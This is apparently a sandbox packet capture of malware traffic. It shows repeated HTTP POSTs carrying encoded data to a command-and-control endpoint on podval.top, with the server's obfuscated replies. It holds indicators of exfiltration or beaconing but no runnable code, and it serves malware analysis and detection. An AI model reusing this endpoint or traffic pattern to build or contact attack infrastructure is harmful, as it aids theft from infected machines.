                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k9VqPxcgwDEo5%2FkjDlthJigMWirj1Yhs6rJB7AlHql775Tlxoi7%2BIBy%2BqrkgBKpqQ%2BUhVLr1VfvKzeMEirD1E0m%2BvOnlK3ruTJ85p9q1h%2BLvE%2FbFnOolCysfPKmn"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a610db7242fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 35 35 34 0d 0a 56 4a 7e 4c 7b 53 5a 5a 6c 61 7f 58 68 62 7f 06 69 64 70 51 68 5e 66 53 79 60 70 05 7e 5c 52 48 77 5d 61 42 79 72 75 02 75 58 63 58 7c 61 78 01 55 4b 72 51 77 71 6b 4a 6b 04 66 5c 7c 77 5b 54 6f 5f 63 55 7e 4d 70 5a 75 71 75 04 74 07 6a 5d 68 4f 71 5b 7d 6c 63 51 69 5e 67 03 75 5c 7b 06 7c 5b 76 59 7e 59 75 01 7b 77 7c 01 6c 59 77 5f 78 54 74 59 6d 61 64 00 7b 4d 72 4e 7c 4e 6b 5f 79 74 67 5e 7d 5b 67 40 62 71 5e 49 7a 51 41 5b 68 5e 67 54 7f 5f 57 40 77 7c 78 07 78 7c 60 03 77 63 6d 50 7b 61 53 04 69 7c 75 5e 7a 61 72 05 77 60 7f 07 76 71 5e 06 60 5f 5c 50 7e 5d 79 5f 77 62 6e 5d 76 66 7c 09 68 52 65 05 77 6f 60 04 7f 73 6f 59 6f 6f 7f 03 7b 5e 66 06 7c 6d 6f 51 77 01 7f 5e 69 62 6e 09 69 53 73 4f 7a 6d 5f 5e 7e 61 7d 07 7b 5d 46 51 7d 7c 70 43 69 60 77 54 7d 74 65 59 78 6d 55 07 78 62 56 00 7c 4f 51 07 7d 74 60 50 7f 70 5b 0c 6d 5d 5e 4f 7f 61 7c 4b 74 5a 75 51 7b 5c 79 06 75 76 64 07 7e 48 64 4e 7e 58 6d 4f 77 62 73 4a 7c 72 57 42 7f 49 6a 0a 78 76 7c 0d 7e 73 6b 48 77 62 75 06 74 [TRUNCATED]
                                                    Data Ascii: 554VJ~L{SZZlaXhbidpQh^fSy`p~\RHw]aByruuXcX|axUKrQwqkJkf\|w[To_cU~MpZuqutj]hOq[}lcQi^gu\{|[vY~Yu{w|lYw_xTtYmad{MrN|Nk_ytg^}[g@bq^IzQA[h^gT_W@w|xx|`wcmP{aSi|u^zarw`vq^`_\P~]y_wbn]vf|hRewo`soYoo{^f|moQw^ibniSsOzm_^~a}{]FQ}|pCi`wT}teYxmUxbV|OQ}t`Pp[m]^Oa|KtZuQ{\yuvd~HdN~XmOwbsJ|rWBIjxv|~skHwbutOiI|qb~BVA}IwuO{x\SG|paK{IpCyw^LxCcz\p{cr|p|{gl|boNv_lI|lU|wV@|OSv|`O{lpIwNT@z_}I}|~{OfuMQKva|OtaT|NP@truMu[`A||WMwB|]`ylg{^fmhCvwRL~rTO|m{mn}ry}`hB|BxN~`V~I\{}sI{bp|Os|gU|peA{sl~bdtsSz_[DvHh~X|~HaAtr{bSY~Cxft}]QuLuLtq}|abK|d@gcuqk{r_J}^_xgh{g^ymUFxrpI{cr{]NZlww^iqNvqVJ}Rs
                                                    Jul 3, 2024 16:43:35.641581059 CEST714INData Raw: 59 64 0a 68 71 53 09 62 52 60 02 78 52 73 5b 63 59 6e 43 6e 5f 71 4a 6a 52 6a 5f 7a 5c 79 05 76 7f 78 42 61 07 67 78 5b 4c 7e 4a 78 5e 72 04 74 04 72 5f 76 65 60 0b 68 52 53 4d 63 6c 6b 5d 7e 73 68 00 6f 6c 63 45 78 70 62 07 7c 53 5d 53 74 59 60
                                                    Data Ascii: YdhqSbR`xRs[cYnCn_qJjRj_z\yvxBagx[L~Jx^rtr_ve`hRSMclk]~sholcExpb|S]StY`}[aTzSYQoaeZS[_PrsHQorSUTQWq`CTq]DUmZkQ|SR|zTWwS~wHXojPPrffbeEQ{_S\SQuu{k\WOIiRlft}MdZvLyLvar]|OT|R~IsurhZouqVMr]ldCT{o[WnWT[cIQ`aLVwpYRF
                                                    Jul 3, 2024 16:43:35.669821024 CEST269OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 384
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:35.773369074 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:35.773624897 CEST384OUTData Raw: 5a 52 5f 58 5b 59 57 5e 58 56 55 51 50 5c 59 52 55 5e 5e 5b 51 5a 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZR_X[YW^XVUQP\YRU^^[QZS\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!29C0']'V'*-1S4=,-%$.'#4;<71#8<"['$Y 1
                                                    Jul 3, 2024 16:43:36.067106962 CEST1236INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oEmJ5IERZN0BbZKT37E5Sld93JfBCvnOe%2FirEyADNZ9gfFMYuDAhaS9Yq%2BPDUkmmKVwCi8oiaFgdt3y21AWtPbdHo6pFTjeKn9yogeJTK2awhHZOvU9hTO4fP1iw"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6144f1642fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 30 34 0d 0a 09 1a 25 58 25 39 31 5d 26 1c 3f 53 39 3e 30 08 3f 3d 28 5f 3b 17 31 14 3c 1a 3a 03 2e 10 04 51 23 5c 2d 05 28 02 24 5d 31 0e 3f 08 22 31 20 5b 04 1c 20 00 3f 5c 29 59 3c 2b 33 54 31 02 3d 47 30 09 1b 1e 30 5d 21 0c 27 28 09 5d 3f 06 3d 54 30 0c 3b 5d 29 06 32 58 28 24 25 02 21 1e 21 54 02 13 21 0d 30 03 25 57 34 33 38 0b 25 56 3a 07 24 0a 05 50 25 33 2a 56 2a 20 21 0c 27 0f 12 5c 35 3c 2b 57 30 38 25 03 27 13 2d 5d 21 38 23 5f 2b 00 00 15 04 59 05 3d 38 5e 28 5a 3b 3a 34 19 0c 2b 20 16 39 04 10 09 04 3e 31 1c 31 57 5f 24 35 5c 12 2d 38 35 02 25 38 2c 5a 1e 3b 3a 19 06 08 3b 3c 1c 39 3c 3c 25 06 58 08 08 37 5a 1c 2a 30 2c 00 30 24 26 14 23 38 32 53 1c 3b 3c 0a 3d 09 31 23 23 36 38 0f 21 31 2a 38 58 39 00 3f 20 0a 2e 08 1d 01 5e 09 24 0b 3d 1d 10 32 3e 16 1e 0d 24 22 58 39 05 51 08 3d 57 2c 16 34 3f 24 20 34 2e 27 24 00 2a 18 07 07 1c 26 5f 30 3f 29 0f 08 2b 56 3a 33 30 11 20 3e 54 02 56 3f 35 1a 5d 00 30 12 2c 22 05 08 30 31 29 53 08 3e 05 1c 21 3f 36 1c 2f 3d 01 25 0e 3c 5d 34 59 28 [TRUNCATED]
                                                    Data Ascii: 404%X%91]&?S9>0?=(_;1<:.Q#\-($]1?"1 [ ?\)Y<+3T1=G00]!'(]?=T0;])2X($%!!T!0%W438%V:$P%3*V* !'\5<+W08%'-]!8#_+Y=8^(Z;:4+ 9>11W_$5\-85%8,Z;:;<9<<%X7Z*0,0$&#82S;<=1##68!1*8X9? .^$=2>$"X9Q=W,4?$ 4.'$*&_0?)+V:30 >TV?5]0,"01)S>!?6/=%<]4Y()*3V,64$3&R<0<991>,T[T1:\68>05*0D;6[";8! >?<9R43'#+81/.#^$><)*1$=;4,;:S$8/<;'8W9<%2;@\=&1=&;';[87V/0;!"8>;>U(04+;XD/2<4>>5&:&#:TU7,819:$*7/)*>9!61#&TU?7?"80?:& 7^R?&=:;1,(>W3_=*$&5;":4ZZ1[,<?3E'$T9?)-9R=U#!>[R:4%%.:5[:23<'<+4
                                                    Jul 3, 2024 16:43:36.067126036 CEST368INData Raw: 02 3d 03 02 50 23 2a 1d 35 3e 07 0c 0a 04 3e 1b 59 3f 09 24 28 22 07 53 2c 3b 06 24 02 39 2f 2d 19 3c 28 27 3b 3e 06 02 1c 0e 56 1e 37 32 5a 0c 1d 3d 3e 03 59 02 3f 14 2c 3a 1a 3e 39 08 2f 0e 0c 34 3f 06 21 09 0a 1e 10 31 02 03 04 36 5f 24 24 34
                                                    Data Ascii: =P#*5>>Y?$("S,;$9/-<(';>V72Z=>Y?,:>9/4?!16_$$4:Z,*Y2;\8/2X8E5Q*:.3=:>_(,9056>4@0=69"+0;&;?R3:2/?6>+08?A5*1'7!8+&W01*4!76?!9>8<<!>&'5?3-*9R==Y_R:4%%/2=?>
                                                    Jul 3, 2024 16:43:36.104398012 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:36.202522993 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:36.202711105 CEST1792OUTData Raw: 5a 55 5f 5f 5b 5d 52 5f 58 56 55 51 50 5f 59 50 55 58 5e 5b 51 5b 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZU__[]R_XVUQP_YPUX^[Q[SYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"'* @&9#_'V')4!Y,.$6',> 41<-,"['$Y =
                                                    Jul 3, 2024 16:43:36.486654043 CEST729INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qrnHK4NzDkroEODtNVoRqfponWW1oM7IKWi9uvBtwcykG%2FqdWX%2F5t2psZtuaSWaZ97y%2FkUhE7doNdQX3MgHgVid4cNsNUfbf0njk4yNTp6dwAHken2tQpU239I0S"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a616f9d642fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 15 25 14 07 59 25 21 33 50 2e 3e 2f 56 3c 03 01 01 2c 17 04 06 28 37 3d 58 2d 2d 2a 52 34 3a 0c 16 2b 3c 2b 06 31 20 27 0c 35 31 20 5b 04 1c 20 01 3c 14 3d 58 3f 16 37 57 32 3c 0f 43 27 09 25 5b 24 2b 31 0a 33 3b 2b 11 2b 3b 39 13 30 0b 3f 13 29 16 39 07 3c 19 31 03 22 24 21 54 02 13 21 0c 27 3d 18 0a 20 23 23 55 26 30 1c 04 30 24 37 54 33 33 25 0d 3e 0d 3a 52 27 31 1a 58 21 01 2b 10 27 28 2a 5a 26 3d 0b 5b 22 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%%Y%!3P.>/V<,(7=X--*R4:+<+1 '51 [ <=X?7W2<C'%[$+13;++;90?)9<1"$!T!'= ##U&00$7T33%>:R'1X!+'(*Z&=["8#_+)V3YT0
                                                    Jul 3, 2024 16:43:37.510761976 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:37.608999968 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:37.609241009 CEST1792OUTData Raw: 5f 53 5a 5b 5b 5f 57 5f 58 56 55 51 50 51 59 56 55 5d 5e 54 51 5b 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _SZ[[_W_XVUQPQYVU]^TQ[S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[&_0C'8$0]).* %Z-!$!]3038-(#!?-<"['$Y
                                                    Jul 3, 2024 16:43:37.933255911 CEST729INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yomWasEoM2fnWlp2WZQpnieaqoSrRYMAc5ZRE1j6j2%2FMBZ%2BQunlcVu4iGr0WSZ19fDauH2yHcSylk6aTtaFwp%2B4it2hTzxS0dzI327XBhUANDZTQfjctGdsHBxtj"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a61fcc9942fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 07 31 5c 29 11 25 0c 3f 50 2d 03 09 57 3c 04 3b 04 38 00 35 5b 3f 1a 07 5b 2d 3e 2a 50 22 2a 22 5a 2a 3c 20 59 26 23 2c 57 22 1b 20 5b 04 1c 23 10 3f 29 2d 13 2b 38 27 1c 24 2c 25 41 27 24 25 5a 24 15 00 53 24 28 0d 5c 2b 5e 36 09 27 0b 33 5b 3d 06 2d 06 3c 09 04 5b 36 1e 21 54 02 13 22 57 25 2d 25 1e 34 33 3f 53 25 0e 36 04 30 27 33 54 27 20 22 53 2a 1d 04 10 33 21 37 00 36 3f 2f 53 33 28 3e 16 26 2e 22 03 35 02 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&1\)%?P-W<;85[?[->*P"*"Z*< Y&#,W" [#?)-+8'$,%A'$%Z$S$(\+^6'3[=-<[6!T"W%-%43?S%60'3T' "S*3!76?/S3(>&."5#_+)V3YT0
                                                    Jul 3, 2024 16:43:38.948298931 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:39.047184944 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:39.047343016 CEST1792OUTData Raw: 5f 5a 5f 5e 5b 57 57 5c 58 56 55 51 50 5a 59 50 55 5b 5e 55 51 5c 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _Z_^[WW\XVUQPZYPU[^UQ\SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]&?$,$3'_).4=!9>0=$U?U/>/[728^/"['$Y )
                                                    Jul 3, 2024 16:43:39.381081104 CEST729INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:39 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iGujGZJzvfx2qQu93evH463tjC4sEgGNuvolIiDJ1q3KY8E8UrfhjaZI246bmna69luF8Wm4l2YA0cozsOaakQ4Pu%2BXAk9o%2F4IZconHEht2w72v%2BzbJVOCOlWCiY"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a628bd1a42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 59 32 03 31 5d 31 31 23 50 3a 5b 23 50 3f 3d 20 14 2c 39 0b 5b 3f 1d 3a 03 2e 2e 04 50 23 3a 36 16 2a 2f 34 58 24 33 2f 08 23 21 20 5b 04 1c 23 5c 3e 39 22 00 29 38 06 0a 25 02 2d 0b 25 34 21 5d 26 28 3e 53 24 28 3f 59 28 28 21 51 27 21 23 5a 3e 06 31 07 3c 19 36 13 22 24 21 54 02 13 22 12 27 3d 3d 57 34 09 28 0a 25 20 14 04 27 37 28 0b 30 33 36 52 3e 30 3e 1d 30 1f 34 11 22 01 38 0d 27 06 3e 5d 24 13 04 00 36 02 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%Y21]11#P:[#P?= ,9[?:..P#:6*/4X$3/#! [#\>9")8%-%4!]&(>S$(?Y((!Q'!#Z>1<6"$!T"'==W4(% '7(036R>0>04"8'>]$6#_+)V3YT0
                                                    Jul 3, 2024 16:43:40.385736942 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1780
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:40.484080076 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:40.484278917 CEST1780OUTData Raw: 5a 57 5f 5c 5b 59 57 5b 58 56 55 51 50 59 59 54 55 5c 5e 5f 51 59 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZW_\[YW[XVUQPYYTU\^_QYSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%_$@$9<% +_)-1U7[%Y9>\'\',8.< 20,"['$Y
                                                    Jul 3, 2024 16:43:40.818722963 CEST720INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:40 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fy8jx1YMfY3NpNVKhTHoKCwk8BcaFnukVJg3bGOd7kfFMHM1PikizpewMSqla%2BsYNgsMWgkT4sdv24c6zq1NzQ6PUQvf0iqKzZEGrb8fQ6UnoGTibEXuEfKsl9T9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a631be9642fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 58 27 2a 3d 11 26 22 23 18 2e 04 27 51 2b 3d 0e 14 38 29 25 5b 3f 24 07 13 39 07 35 09 23 29 22 17 28 2c 38 5d 26 0e 3c 54 36 31 20 5b 04 1c 23 5b 3c 14 03 58 3c 38 2b 11 25 05 31 42 27 27 14 00 33 28 2e 56 30 06 2b 5d 3c 06 13 50 27 32 33 5b 2b 3b 2e 5e 3f 37 25 06 20 34 21 54 02 13 22 56 24 13 29 52 20 30 27 54 25 0e 22 04 30 27 33 54 30 23 32 54 3e 55 36 52 33 08 23 05 23 3f 02 0a 26 2b 3e 18 24 13 2e 03 35 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a
                                                    Data Ascii: 98%X'*=&"#.'Q+=8)%[?$95#)"(,8]&<T61 [#[<X<8+%1B''3(.V0+]<P'23[+;.^?7% 4!T"V$)R 0'T%"0'3T0#2T>U6R3##?&+>$.58#_+)V3YT
                                                    Jul 3, 2024 16:43:40.953573942 CEST5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0
                                                    Jul 3, 2024 16:43:41.968285084 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:42.066499949 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:42.066668987 CEST1772OUTData Raw: 5f 51 5f 5d 5e 5c 52 5d 58 56 55 51 50 50 59 52 55 50 5e 59 51 58 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _Q_]^\R]XVUQPPYRUP^YQXS[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y&09#Y$0$)>27>%Z:=)['6*3-=7"14/"['$Y
                                                    Jul 3, 2024 16:43:42.395004988 CEST725INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:42 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=io3922vvlvXpgXCmwzLxl4hnZyDhTOeIWm2vjPhOgKAXdmHO5GZO%2FNTWx0Tl9Z9Hcdjkm9mPWda0I4KYzx3sjwUytujAztijQPev5QzRiwW9stHPf5oX99I271qW"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a63b98f142fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 59 26 29 22 02 26 32 0e 0a 39 03 2b 19 29 2d 38 15 2f 07 32 03 2a 27 2a 01 2e 58 29 0d 20 14 00 15 2a 3f 24 5d 26 1e 38 56 35 1b 20 5b 04 1c 20 03 28 14 32 02 3c 2b 3b 52 31 2f 21 41 30 37 18 02 26 38 2d 0f 33 16 0d 11 28 38 13 13 30 0c 2f 11 3d 38 08 5a 3f 37 08 5e 22 24 21 54 02 13 22 57 25 2d 39 53 37 09 3f 55 26 30 13 16 30 24 3b 52 33 0a 32 1e 28 33 36 53 24 08 2b 03 35 01 24 0b 27 06 0c 5d 26 3d 39 11 36 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%Y&)"&29+)-8/2*'*.X) *?$]&8V5 [ (2<+;R1/!A07&8-3(80/=8Z?7^"$!T"W%-9S7?U&00$;R32(36S$+5$']&=968#_+)V3YT0
                                                    Jul 3, 2024 16:43:43.401257038 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:43.499656916 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:43.834103107 CEST729INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:43 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wweH%2Fbk%2BTWGyb%2FwaPfh6c0dKlvne9q6kAnviW9cuf5LnmqUm6y9MZpiyFvubHD2MG3cW0qWUdwVwPyPmzfpysgSLhezPZZ4KHhGPlNazLfeEParetFMsuMRTiYzT"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6449a1042fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 01 25 39 22 03 24 32 27 52 2e 5b 38 0b 28 13 0a 5e 2c 5f 29 5f 2a 34 0b 58 2e 10 0c 16 23 3a 32 17 3f 02 0a 58 25 0e 2f 09 22 31 20 5b 04 1c 23 58 3f 3a 07 5e 3f 01 33 57 25 3c 35 05 27 51 21 5b 30 05 0f 0d 24 16 09 12 3c 28 32 0c 27 0c 20 05 2b 3b 3d 02 2b 09 00 5a 36 34 21 54 02 13 22 51 27 3d 39 11 23 1e 28 0b 26 20 3e 04 27 27 30 09 27 33 32 10 29 1d 35 0a 27 22 3c 10 23 2f 0a 0c 26 38 39 02 30 13 0c 03 21 12 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&%9"$2'R.[8(^,_)_*4X.#:2?X%/"1 [#X?:^?3W%<5'Q![0$<(2' +;=+Z64!T"Q'=9#(& >''0'32)5'"<#/&890!#_+)V3YT0
                                                    Jul 3, 2024 16:43:44.839131117 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:44.937432051 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:45.339270115 CEST733INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:45 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
